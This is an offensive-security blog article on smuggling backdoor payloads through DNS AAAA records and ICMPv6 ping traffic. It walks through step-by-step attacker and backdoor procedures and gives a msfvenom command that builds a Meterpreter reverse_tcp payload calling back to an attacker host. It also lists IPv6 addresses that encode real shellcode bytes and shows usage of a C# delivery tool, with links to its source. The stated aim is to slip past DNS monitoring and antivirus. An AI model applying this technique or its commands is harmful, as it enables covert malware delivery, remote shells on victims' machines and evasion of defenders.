Transferring Backdoor Payloads by DNS AAAA records and IPv6 Address

Share this…

Transferring Backdoor Payloads by DNS AAAA records and IPv6 Address. in this article i want to explain how can use IPv6 Address (AAAA) records in DNStraffic for Transferring Payloads. In my previous Article I explained how can use DNS and PTR Records , now We should talk about AAAA records .

This article has 2 Parts :

  • PART I : DNS AAAA records and ICMPv6
  • PART II : DNS and AAAA records (large DNS AAAA records Response)

PART I: DNS AAAA records and ICMPv6

IPv6 address is really good thing for transferring Payloads let me explain how can do this VERY SIMPLE.

For example we have one IPv6 address like this :

fe80:1111:0034:abcd:ef00:ab11:ccf1:0000

in this case we can use these “xxxx” sections of IPv6 Address for our Payloads .

fe80:1111:xxxx:xxxx:xxxx:xxxx:xxxx:wxyz

I think we have 2 ways for using this IPv6 address for our Payloads first we can use DNS and AAAA records and second is Using these IPv6 Addresses and DNS AAAA record also ICMPv6 Traffic by Ping6 .

ICMPv6 and Ping6 : in this case you can change Attacker IPv6 Address by Fake IPv6 address with Injected Payload then from Backdoor system you can get these IPv6 addresses by Ping6 loop (ICMPv6 traffic)

so we have something like this :

(backdoor system) ipaddress = {192.168.1.120}

(attacker system) ipaddress = {192.168.1.111 ,fe80:1111:0034:abcd:ef00:ab11:ccf1:0000}

(attacker system) DNS name = test.domain.com , and DNS service Installed {dnsmasq or dnsspoof}

DNS AAAA records and ICMPv6 step by step :

step1 : (attacker DNS server) record0 =>fe80:1111:0034:abcd:ef00:ab11:ccf1:0000 AAAA test.domain.com

step2 : (backdoor system) ==> nslookup test.server.com 192.168.1.111

step3 : (backdoor system) loop Ping6 => (Attacker system fe80:1111:0034:abcd:ef00:ab11:ccf1:0000)

step4 : (backdoor system) dump Injected Payloads in IPv6 Address by Ping6 Response , dumping these sections {0034:abcd:ef00:ab11:ccf1}

step5 : (attacker DNS server) record0 change to new AAAA for test.domain.com

step6 : (attacker DNS server) record0 =>fe80:1111:cf89:abff:000e:09b1:33b1:0001 AAAA test.domain.com

step6-1 : (attacker system) Adding or changed NIC IPv6 address by ifconfig eth0 { NewIPv6 Address : fe80:1111:cf89:abff:000e:09b1:33b1:0001 }

step6-2 : ping6 response for step 3 = timeout or unreachable (error) ,this time is Flag for getting new IPv6 Address or probably your Traffic Detected by Something and Blocked.

step7 : (backdoor system) => nslookup test.server.com 192.168.1.111

step8 : (backdoor system) loop Ping6 test.domain.com => {New IPv6 Address fe80:1111:cf89:abff:000e:09b1:33b1:0001}

step9 : (backdoor system) dump Injected Payloads from new IPv6 Address by Ping6 Response , dumping these sections : {cf89:abff:000e:09b1:33b1}

Note1 : when we can know IPv6 Address changed ? when ping6 response from Attacker system was like timeout or unreachable … also you can check this by Nslookup too.

Note2 : also you can use multiple ipv6 address for Attacker NIC in this case not needed to step “6-1”. but in this time you can’t use“Note 1:” so in this case you should use timer or Loop for getting new ipv6 address from attacker system by nslookup toolor something like that .it mean from Backdoor system you can get line by line IPv6 address for Attacker system by Nslookup and DNS Round-robin feature and chunking IPv6 DNS names too.

after these Steps you have 20 bytes Payload by DNS and ICMPv6 traffic like these :

payload0= fe80:1111:0034:abcd:ef00:ab11:ccf1:0000 ==> 0034:abcd:ef00:ab11:ccf1

payload1= fe80:1111:cf89:abff:000e:09b1:33b1:0001 ==> cf89:abff:000e:09b1:33b1

so we have this Payload after two Ping6

response:0034abcdef00ab11ccf1cf89abff000e09b133b1

but in this technique you can do this by DNS traffic only , it is mean you can remove all steps for Ping6 . So you can dump payload from DNS server by DNS response only in step 2 and step 7 if you want to do this without Ping6 and ICMPv6 traffic . But we talk about this one in PART2: (Talking about DNS and AAAA records)

let me show you some pictures about ICMPv6 Method without Code and tool .

I will Publish C# code for this one in future and maybe one step by step article too but I want to show you all some pictures about DNS AAAA + ICMPv6 technique.

Picture: A

in picture A you can see we have 8 AAAA records for DNS name : test.domain.com , also you can see Ping response for this IPv6 address , in this Technique DNS and ICMPv6 you can download DNS names by 1 or 2 request then you can use Ping6 for these IPv6 Address if you want to use ICMPv6 .

In picture A we have 8 AAAA records so we have 8 * 10 bytes = 80 bytes Meterpreter Payload !

fe80:1111:fc48:83e4:f0e8:cc00:0000:ae0 test.domain.com

fe80:1111:4151:4150:5251:5648:31d2:ae1 test.domain.com

fe80:1111:6548:8b52:6048:8b52:1848:ae2 test.domain.com

fe80:1111:8b52:2048:8b72:5048:0fb7:ae3 test.domain.com

fe80:1111:4a4a:4d31:c948:31c0:ac3c:ae4 test.domain.com

fe80:1111:617c:022c:2041:c1c9:0d41:ae5 test.domain.com

fe80:1111:01c1:e2ed:5241:5148:8b52:ae6 test.domain.com

fe80:1111:208b:423c:4801:d066:8178:ae7 test.domain.com

PAYLOAD0= fc4883e4f0e8cc000000 and Counter = ae0

PAYLOAD1= 415141505251564831d2 and Counter = ae1

so we have this payload = fc4883e4f0e8cc000000415141505251564831d2

why Ping , when we can Get payloads by DNS request ?

if you want to have DNS Request like DNS Request Loop or DNS Request with Large Response by AAAA records then probably this is flag for Detecting by DNS Monitoringtools so if you have 1 or 2 ping6 for AAAA records after each DNS AAAA Response then I think it is Normal traffic and Risk for detecting by DNS Monitoring Device or DNS Monitoring Tools is very low .

For example you can use one Request with one Response by 1 or 2 or 3 AAAA records only . It is mean if your Response had 4 AAAA records or more than 4 AAAA records then maybe Network monitoring Device/Tools will detect your traffic but SOC/NOC Guys better than me can talkabout these Restriction rules in networks .

As you can see in picture A my request for test.domain.com had 8 AAAA records in Response.

So in this case you should chunking your payloads in IPv6 addresses also DNS names too .

Let me explain something about ICMPv6 , if you want to ping one system by IPV6address , first you should get IPv6 address for that system, so you need DNS request always . Important Point is how much DNS request you need for Dumping all IPv6 Address also Dumping InjectedMeterpreter Payloads in IPv6 address ?

One Request ?

If you want to have All IPv6 Address by one Request and one Response then you will have one Response with too much AAAA records in DNS Response , so risk to detecting is high .

like picture A1:

Picture A1:

and in next picture A2 you can see length for 2 request first small Response , second large response

Picture A2: as you can see in picture A2 we have two DNS AAAA Response first had 132 length (small Response) and second had 1503 length (large Response)

I will explain in this article About one Request and one Response for Dumping all IPv6 Address by DNS AAAA Records like Second Response in Picture A2 , but in this case we talk about DNS + ICMPv6 method also risk about Detecting Large DNS AAAA records Response too , as you can see in Picture A2 we have Second Response with Large Length and with this Length Risk to Detection by DNS Monitor Tools is high .

Two Request or More than two Request ?

as you can see in picture B my payloads are in 3 DNS name {test0.domain.com , test1.domain.com , test2.domain.com}

and I had ping6 one time for each IPv6 Address with “100% Ping Reply“.

So in this example we have 3 Request and 3 Response with two AAAA records for each response also we have ICMPv6 traffic after each DNS AAAA Response and finally we have small length for DNS response too.

Picture B:

Note: I had Multiple IPv6 Address in my Linux system for Ping6 Reply like picture C.

you can do “STEP 6-1” by “Ifconfig or Multiple IPv6 Assign to NIC” like picture C.

Picture C:

and this is our DNS queries like picture C1:

Picture C1:

now you can see in picture D another example for chunking request and response .

Picture D:

also you can see in Picture E our DNS server Log for DNS Request and Response too

Picture E:

anyway , as you can see by Pictures this Method is possible Technically and in the future i want to make C# source code for this one .

PART II: DNS and AAAA records (large DNS AAAA records Response)

Now In this article I want to talk about DNS and AAAA records and talking about how can get these payloads by one DNS Request and one DNS response from Fake DNS server to backdoor system. So we talking about Large AAAA Response , it mean after one DNS response you can have all payload in backdoor system also you have Meterpreter session by one DNS AAAA Response.

Step by step Transferring Backdoor Payloads with DNS AAAA records by NativePaylaod_IP6DNS tool:

step1: making FakeDnsServer with Hosts file .

in this case for Attacker system I want to use dnsmasq tool and dnsmasq.hosts file .

Before make this file you need payload so with this command you can have one payload.

Msfvenom–arch x86_64 –platform windows -pwindows/x64/meterpreter/reverse_tcp lhost 192.168.1.50 -f c >/payload.txt

note: in this case 192.168.1.50 was Attacker FakednsServer and Attacker Metasploitlistener too

now you should make hosts file by this payload string like picture 1 ,you can make it with this syntax:

syntax1: NativePayload_IP6DNS.exe null 0034abcdef00ab11ccf1cf89abff000e09b133b1…

Picture 1:

now copy these IPv6 address to DNS Hosts file like picture 2 and you need DNS name after each line of IPv6 address please watching to Picture 2.

Picture 2:

in this case I want to use dnsmasq tool for DNS server so you can use /etc/hosts file or /etc/dnsmasq.hosts

it depend on your configuration for dnsmasq tool .

So like picture 3 you can start your DNS server with this command.

Picture 3:

After started DNS Server your dnsmasq should read 51 Address from hosts file at least .

Finally with this syntax you will have Meterpreter Session by one DNS IPv6 AAAA records Response (one Large Response like Picture A2 , Second DNS response with 1503 length)

Syntax: NativePayload_IP6DNS.exe “FQDN” “Fake DNS Server”

Syntax: NativePayload_IP6DNS.exe test.domain.com 192.168.1.50

Picture 4:

At a glance : DNS traffic PTR Records and especially IPv6 AAAA Records are really good things for Transferring your Payload to bypassing Network Monitoring or Something like that , and with these techniques Anti-viruses bypassed too

C# Source code for NativePayload_IP6DNS.exe tool : (DNS AAAA records)

https://github.com/DamonMohammadbagher/NativePayload_IP6DNS

C# Source code for NativePayload_DNS.exe tool : (DNS PTR records)

https://github.com/DamonMohammadbagher/NativePayload_DNS

8